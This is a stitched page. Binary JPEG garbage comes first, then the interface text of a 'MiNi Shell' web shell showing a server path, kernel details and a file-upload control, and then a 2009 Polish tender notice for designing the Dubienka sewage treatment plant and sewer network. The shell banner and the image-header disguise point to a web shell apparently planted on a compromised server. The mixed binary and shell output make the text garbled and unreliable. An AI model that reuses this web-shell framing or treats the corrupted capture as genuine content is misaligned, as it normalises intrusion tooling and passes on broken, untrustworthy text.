JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090514/75457-N-2009.html

<p class="kh_header"><b>Dubienka: Opracowanie dokumentacji budowlanej i wykonawczej przebudowy oczyszczalni ścieków w Dubience wraz z budową sieci kanalizacji sanitarnej w miejscowosci Dubienka</b><br>
<b>Numer ogłoszenia: 75457 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dubienka , ul. 3 Maja 6, 22-145 Dubienka, woj. lubelskie, tel. 082 5668081, faks 082 5668080.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dubienka.gmina.woi.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji budowlanej i wykonawczej przebudowy oczyszczalni ścieków w Dubience wraz z budową sieci kanalizacji sanitarnej w miejscowosci Dubienka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis stanu istniejącego: 
Dubienka  posiada system kanalizacji sanitarnej jedynie w części miejscowości . Długość sieci kanalizacyjnej wynosi 1,5  km, ilość przyłączy: 41.  
Na terenie gminy znajduje się jedna komunalna mechaniczno-biologiczna oczyszczalnia ścieków w miejscowości Dubienka o przepustowości  43,6 m3/d. W sytuacjach awaryjnych uruchamiana jest druga oczyszczalnia kontenerowa typu MIKROREAKTOR  o przepustowości 56,0 m3/d. Oczyszczone ścieki odprowadzane są do rzeki Wełnianki, natomiast osady odwożone są na wyznaczone składowisko odpadów. Oczyszczalnia ścieków została oddana do użytku w 1977 r. W jej skład wchodzą następujące urządzenia:
-  krata koszowa umieszczona w studzience D=1,0 m, w której dnie przewidziano przestrzeń do gromadzenia piasku. Kosz wyciągany jest za pomocą żurawia. Skratki kompostowane na terenie oczyszczalni, 
-  pompownia ścieków składa się ze studni zbiorczej D = 1,5 m o pojemności użytkowej ok. 2 m3 oraz budynku, w którym znajdują się 2 pompy typu APRs65/175 oraz zbiornik samozasysający, 
-  osadnik Imhoffa o średnicy D = 5,0 m i głębokości całkowitej H = 6,7 m z korytem przepływowym o szerokości 2,0 m i długości 5,0 m.
pojemność komory przepływowej Vp = 18,53 m3
pojemność komory fermentacyjnej Vf = 81,2 m3
-  złoże biologiczne spłukiwane
   powierzchnia złoża F = 14,4 m2
wysokość złoża      H = 2,75 m
objętość złoża         V = 39,7 cm3
Złoże jest obudowane i zadaszone,
-  osadnik wtórny pionowy o średnicy D = 3,0 m i głębokości czynnej H = 4,3 m, pojemność części przepływowej Vp = 18,7 m3
-  poletka do suszenia osadu o wymiarach 10,4 x 8,4 m, podzielone zostały na 4 kwatery. Usuwanie osadu z poletek ręczne. 
Ścieki dopływające do oczyszczalni przepływają przez kraty, na których zatrzymywane są większe zanieczyszczenia. Następnie ścieki - poprzez studnię zbiorczą i przepompownię - kierowane są do osadnika wstępnego / zbiornika Imhoffa /, w którym następuje sedymentacja osadu. Ścieki z osadnika wstępnego kierowane są na złoże biologiczne spłukiwane. Po przepłynięciu przez złoże trafiają do osadnika wtórnego pionowego, a następnie do odbiornika - rzeki Wełnianki. Osady wstępne, po fermentacji w komorze fermentacyjnej, gromadzone są na poletkach osadowych i docelowo składowane na składowisku odpadów komunalnych. 
W 1993 roku została wykonana druga oczyszczalni typu MIKROREAKTOR 
o przepustowości 56 m3/d (2 typowe kontenery). Została ona włączona do eksploatacji na czas remontu starego ciągu technologicznego. Po zakończeniu remontu w 1994 roku została wyłączona z eksploatacji. 

A.Zakres prac projektowych:
1)  przy przebudowie oczyszczalni ścieków:  
 zaprojektowanie mechaniczno - biologicznej  oczyszczalni ścieków  
o przepustowości 150 m3/d, umieszczonej w budynku wyposażonym w instalację sanitarną  i elektryczną,
 przystosowanie osadnika Imhoffa  do  fermentacji ścieków dowożonych z osadami z przydomowych oczyszczalni ścieków ( w zakresie : uzupełnienie tynków, odmalowanie ścian, wymiana pokrycia na blachę ocynkowaną, od wewnątrz pokrycie zbiornika  powłoką bitumiczna itp.) 
 wykorzystanie istniejącego  budynku socjalnego  po remoncie na część  socjalną (wydzielając w nim następujące pomieszczenia: pokój socjalny, szatnia brudna i czysta, węzeł sanitarny, dyżurka, ewentualnie pomieszczenie na podręczne laboratorium, jeżeli wystarczy powierzchni).
2) przy  remoncie budynku oczyszczalni ścieków i zagospodarowaniu  terenu:
przebudowa ścian wewnątrz budynku,
wykonanie wewnętrznych instalacji pod nowe funkcje budynku,
położenie nowych tynków, posadzek i podłóg,
malowanie,
termomodernizacja, tj. wymiana stolarki okiennej i drzwiowej, docieplenie ścian, wymiana pokrycia dachowego, itp.
wykonanie nowego ogrodzenia,
przebudowa kolektora odprowadzającego ścieki do rzeki  oraz wylotu ścieków oczyszczonych do rzeki,
przełożenie istniejącej sieci telekomunikacyjnej w celu usunięcia kolizji  z proj. budynkiem,
przystosowanie oczyszczalni typu Mikroreaktor  do sprawnego działania jako ciąg rezerwowy do pracy podczas budowy nowej  oczyszczalni  oraz podczas konserwacji i remontów,
przystosowanie poletek osadowych do pełnienia roli kompostowni,
rozbiórka budynku przepompowni, złoża spłukiwanego i osadnika wtórnego,
zaprojektowanie sieci technologicznych łączących poszczególne obiekty i urządzenia  na terenie i w budynkach oczyszczalni,
dostosowanie dróg i placów do nowych potrzeb,
zaprojektowanie zieleni izolacyjnej  wokół ogrodzenia.
3)  Zakres kanalizacji sanitarnej: długość sieci kanalizacyjnej grawitacyjnej ok. 
  8,5 km. w tym przebudowa istniejącej sieci dł. 1,5 km  Ilość przyłączy ok.350 w tym włączenie do nowej sieci istniejących przyłączy.
B. Zakres przedmiotowy zamówienia obejmuje:
1.Opracowanie projektu budowlanego i wykonawczego 
2.Uzyskanie map do celów projektowych.
3.Uzyskanie aktualnych wypisów z rejestru gruntów.
4.Uzyskanie pisemnej zgody  właścicieli nieruchomości przez które przebiegać będzie sieć i przyłącza. 
5.Uzyskanie zapewnienia zasilenia energetycznego, warunków przejścia pod drogami, rowami i innymi przeszkodami terenowymi niezbędnymi do kompletu dokumentacji.
6.Opracowanie operatu wodno-prawnego wraz z uzyskaniem pozwolenia wodno-prawnego.
7.Sporządzenie kompletnego wniosku (z niezbędnymi materiałami) do wydania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, sporządzenie raportu o oddziaływaniu przedsięwzięcia na środowisko wymaganego prawem polskim - o ile jest on niezbędny.
8.Opracowanie kosztorysu inwestorskiego.
9.Opracowanie przedmiaru robót.
10.Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych.
11.Uzyskanie wszelkich opinii, badań, warunków technicznych, uzgodnień i pozwoleń wymaganych przepisami.
C. Wymagana forma projektu budowlanego wykonawczego:
1.Dokumentację techniczną składającą się na przedmiot zamówienia należy sporządzić w formie papierowej i elektronicznej  w 5 egz. w wersji papierowej + 1 egz. na nośniku elektronicznym.
2.Specyfikację techniczną wykonania i odbioru robót  w 1 egz. w wersji papierowej + 1 egz. na nośniku elektronicznym.
3.Przedmiar robót w 1 egz. w wersji papierowej + 1 egz. na nośniku elektronicznym.
4.Kosztorys inwestorski w  2 egz. w wersji papierowej.
5.Dokumentacja w formie elektronicznej winna być przekazana Zamawiającemu na płycie/płytach CD w formie plików w formacie xls, doc lub pdf zabezpieczonych przed zmianami  i umożliwiających przesłanie dokumentacji drogą elektroniczną.
 D. Wykonawca wykona projekt z uwzględnieniem poniższych wymagań:
1.  Zamówienie musi być realizowane zgodnie z:
Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004r. Nr 202, poz. 2072 z późn. zm.)
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r. Nr 130, poz. 1389)
art. 34 ustawy z dnia 7 lipca 1994r. Prawo budowlane ( Dz. U. z 2006r. Nr 156, poz. 1118 z późn. zm.)
Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002r. Nr 75, poz. 690 z późn. zm.)
Obowiązującymi normami oraz zasadami wiedzy technicznej.

E. Dokumentacja winna spełniać następujące wymagania:
1.Powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć.
2.Będzie służyć jako opis przedmiotu zamówienia w postępowaniu publicznym na roboty budowlane i winna być sporządzona w formie plików w formacie xls, doc lub pdf zabezpieczonych przed zmianami i umożliwiających przesłanie dokumentacji do realizacji (na jej podstawie) pełnego zakresu robót budowlanych.
3.W swej treści powinna określać technologię robót, użyte materiały i zastosowane urządzenia w sposób umożliwiający zachowanie uczciwej konkurencji. Powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii i urządzeń.
F. Obowiązki Wykonawcy na etapie opracowywania dokumentacji projektowej:
1.  Zorganizowanie minimum 3 spotkań roboczych z Zamawiającym i użytkownikiem sieci kanalizacyjnej w celu omówienia przyjętych rozwiązań projektowych i materiałowych, które zakończyć się muszą protokołami podpisanymi przez strony..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 2 000<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.
   a)dysponują lub będą dysponowali osobami zdolnymi do wykonania zamówienia, które posiadają odpowiednie uprawnienia do projektowania w branży: konstrukcyjno-budowlanej, sieci i instalacji sanitarnych, instalacji elektrycznych - min. 1 osoba w każdej branży. Zamawiający dopuszcza posiadanie dwóch lub więcej uprawnień przez jedną osobę.
   b) w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie należycie wykonali minimum dwie usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. Przez usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia należy rozumieć usługę polegającą na sporządzeniu projektu budowlanego i wykonawczego przebudowy lub budowy oczyszczalni ścieków i budowy sieci kanalizacji sanitarnej wraz z przyłączami, na kwotę min. 40.000,00 zł brutto każda.  
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy.

Ocena spełnienia warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez Wykonawców oświadczenia i dokumenty zgodnie z formułą spełnia - nie spełnia.  W przypadku złożenia oferty wspólnej przy ocenie spełnienia warunków, o których mowa w art. 22 ust. 1 pkt 2 i 3 ustawy, Zamawiający będzie brał pod uwagę łączne doświadczenie Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy z wykorzystaniem wzoru stanowiącego załącznik Nr 1 do SIWZ
2.	Oświadczenie o spełnieniu warunków udziału w postępowaniu określonych przepisami art. 22 ust. 1 ustawy  - według wzoru stanowiącego załącznik nr 2 do SIWZ,
3.	W przypadku ustanowienia pełnomocnika - pełnomocnictwo do reprezentowania Wykonawcy w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
4.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy składa następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,  jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia składa następujące dokumenty:
a) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności złożony według wzoru stanowiącego załącznik Nr 3 do SIWZ. Przedłożony wykaz powinien zawierać co najmniej po jednej osobie posiadającej wymagane uprawnienia do projektowania w branży: konstrukcyjno-budowlanej, sieci i instalacji sanitarnych, instalacji elektrycznych. Zamawiający dopuszcza posiadanie dwóch lub więcej uprawnień przez jedną osobę.
b) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5a   wykonawca wskazał osoby, którymi będzie dysponował,
c) dokumenty potwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia,
d) wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie,  odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, daty  wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, złożony według wzoru stanowiącego załącznik nr 4 do SIWZ. Sporządzony wykaz musi zawierać co najmniej dwie usługi polegające na sporządzeniu projektu budowlanego i wykonawczego przebudowy lub budowy oczyszczalni ścieków i budowy sieci kanalizacji sanitarnej wraz z przyłączami na kwotę min. 40.000,00 zł brutto każda.  
6.	Dokumenty wymagane w przypadku składania oferty wspólnej:
Oferta winna zawierać oświadczenia i dokumenty opisane w art. 22 ust. 1 pkt 1 i 4 ustawy dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.

7.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ;
1)	pkt 4a,składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
c) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

8.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 7, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dubienka.eurzad.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 22-145 Dubienka ul. 3 Maja 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 09:00, miejsce: Sekretariat Urzędu Gminy w Dubience 22-145 Dubienka ul. 3 Maja 6 pok.Nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com